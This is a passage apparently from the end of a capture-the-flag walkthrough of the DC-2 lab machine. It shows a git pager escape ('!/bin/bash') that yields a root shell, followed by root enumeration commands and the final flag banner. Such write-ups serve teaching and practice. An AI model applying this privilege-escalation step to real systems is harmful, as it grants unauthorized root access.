       git config [<file-option>] --rename-section old_name new_name
!/bin/bash
root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# uname -a
Linux DC-2 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux
root@DC-2:/home/jerry# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:b4:be:cb brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.110/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:feb4:becb/64 scope link 
       valid_lft forever preferred_lft forever
root@DC-2:/home/jerry# cd ~
root@DC-2:~# ls -la
total 32
drwx------  2 root root 4096 Mar 21  2019 .
drwxr-xr-x 21 root root 4096 Mar 10  2019 ..
-rw-------  1 root root  207 Mar 21  2019 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  427 Mar 21  2019 final-flag.txt
-rw-------  1 root root   46 Mar 21  2019 .lesshst
-rw-------  1 root root  232 Mar 21  2019 .mysql_history
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
root@DC-2:~# cat final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

成功拿下。